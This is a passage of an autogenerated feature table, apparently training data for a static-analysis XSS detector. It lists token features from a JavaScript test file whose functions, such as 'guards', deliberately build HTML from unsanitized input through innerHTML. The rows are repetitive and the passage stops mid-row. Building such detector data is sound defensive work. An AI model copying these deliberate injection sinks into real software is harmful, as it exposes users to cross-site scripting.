autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:26 | documen ... elector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:33 | documen ... ("#id") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:33 | documen ... ("#id") | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:33 | documen ... ("#id") | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:33 | documen ... ("#id") | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:33 | documen ... ("#id") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:33 | exceptional return of documen ... ("#id") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:33 | exceptional return of documen ... ("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:33 | exceptional return of documen ... ("#id") | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:33 | exceptional return of documen ... ("#id") | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:33 | exceptional return of documen ... ("#id") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:43 | documen ... nerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:43 | documen ... nerHTML | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:43 | documen ... nerHTML | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:43 | documen ... nerHTML | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:43 | documen ... nerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:98 | documen ... "\\"/>" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:98 | documen ... "\\"/>" | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:98 | documen ... "\\"/>" | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:98 | documen ... "\\"/>" | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:98 | documen ... "\\"/>" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:14:68:26 | querySelector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:14:68:26 | querySelector | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:14:68:26 | querySelector | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:14:68:26 | querySelector | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:14:68:26 | querySelector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:28:68:32 | "#id" | CalleeFlexibleAccessPath | document.querySelector | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:28:68:32 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:28:68:32 | "#id" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23133,24 +152511,54 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:28:68:32 | "#id" | enclosingFunctionName | guards | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:28:68:32 | "#id" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:28:68:32 | "#id" | receiverName | document | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:35:68:43 | innerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:35:68:43 | innerHTML | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:35:68:43 | innerHTML | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:35:68:43 | innerHTML | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:35:68:43 | innerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:47:68:59 | "\\"" document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:47:68:59 | "\\""' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:47:68:89 | " attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:47:68:89 | "" | assignedToPropName | innerHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:47:68:98 | "" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:47:68:98 | "" | contextSurroundingFunctionParameters | (attrVal) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:47:68:98 | "" | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:47:68:98 | "" | enclosingFunctionName | guards | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:47:68:98 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:69 | attrVal | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:69 | attrVal | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:69 | attrVal | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:69 | attrVal | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:69 | attrVal | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:77 | attrVal.replace | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:77 | attrVal.replace | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:77 | attrVal.replace | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:77 | attrVal.replace | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:77 | attrVal.replace | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:89 | attrVal ... /g, "") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:89 | attrVal ... /g, "") | contextSurroundingFunctionParameters | (attrVal) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:89 | attrVal ... /g, "") | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:89 | attrVal ... /g, "") | enclosingFunctionName | guards | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:89 | attrVal ... /g, "") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:89 | attrVal ... /g, "") | stringConcatenatedWith | '' -endpoint- '' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:89 | exceptional return of attrVal ... /g, "") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:89 | exceptional return of attrVal ... /g, "") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:89 | exceptional return of attrVal ... /g, "") | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:89 | exceptional return of attrVal ... /g, "") | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:63:68:89 | exceptional return of attrVal ... /g, "") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:71:68:77 | replace | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:71:68:77 | replace | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:71:68:77 | replace | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:71:68:77 | replace | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:71:68:77 | replace | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:79:68:84 | /"\|'/g | CalleeFlexibleAccessPath | attrVal.replace | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:79:68:84 | /"\|'/g | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:79:68:84 | /"\|'/g | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23173,6 +152581,36 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:93:68:98 | "\\"/>" | enclosingFunctionName | guards | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:93:68:98 | "\\"/>" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:93:68:98 | "\\"/>" | stringConcatenatedWith | '' + attrVal.replace() -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:15 | attrVal | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:15 | attrVal | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:15 | attrVal | enclosingFunctionBody | attrVal document querySelector #id innerHTML <img alt= document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:15 | attrVal | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:15 | attrVal | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:29 | attrVal ... f("\\"") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:29 | attrVal ... f("\\"") | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:29 | attrVal ... f("\\"") | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:29 | attrVal ... f("\\"") | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:29 | attrVal ... f("\\"") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:29 | exceptional return of attrVal ... f("\\"") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:29 | exceptional return of attrVal ... f("\\"") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:29 | exceptional return of attrVal ... f("\\"") | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:29 | exceptional return of attrVal ... f("\\"") | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:29 | exceptional return of attrVal ... f("\\"") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:36 | attrVal ... === -1 | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:36 | attrVal ... === -1 | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:36 | attrVal ... === -1 | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:36 | attrVal ... === -1 | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:36 | attrVal ... === -1 | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:67 | attrVal ... === -1 | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:67 | attrVal ... === -1 | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:67 | attrVal ... === -1 | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:67 | attrVal ... === -1 | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:9:69:67 | attrVal ... === -1 | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:17:69:23 | indexOf | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:17:69:23 | indexOf | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:17:69:23 | indexOf | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:17:69:23 | indexOf | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:17:69:23 | indexOf | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:25:69:28 | "\\"" | CalleeFlexibleAccessPath | attrVal.indexOf | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:25:69:28 | "\\"" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:25:69:28 | "\\"" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23181,6 +152619,41 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:25:69:28 | "\\"" | enclosingFunctionName | guards | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:25:69:28 | "\\"" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:25:69:28 | "\\"" | receiverName | attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:35:69:36 | -1 | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:35:69:36 | -1 | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:35:69:36 | -1 | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:35:69:36 | -1 | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:35:69:36 | -1 | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:36:69:36 | 1 | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:36:69:36 | 1 | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:36:69:36 | 1 | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:36:69:36 | 1 | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:36:69:36 | 1 | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:47 | attrVal | contextFunctionInterfaces | 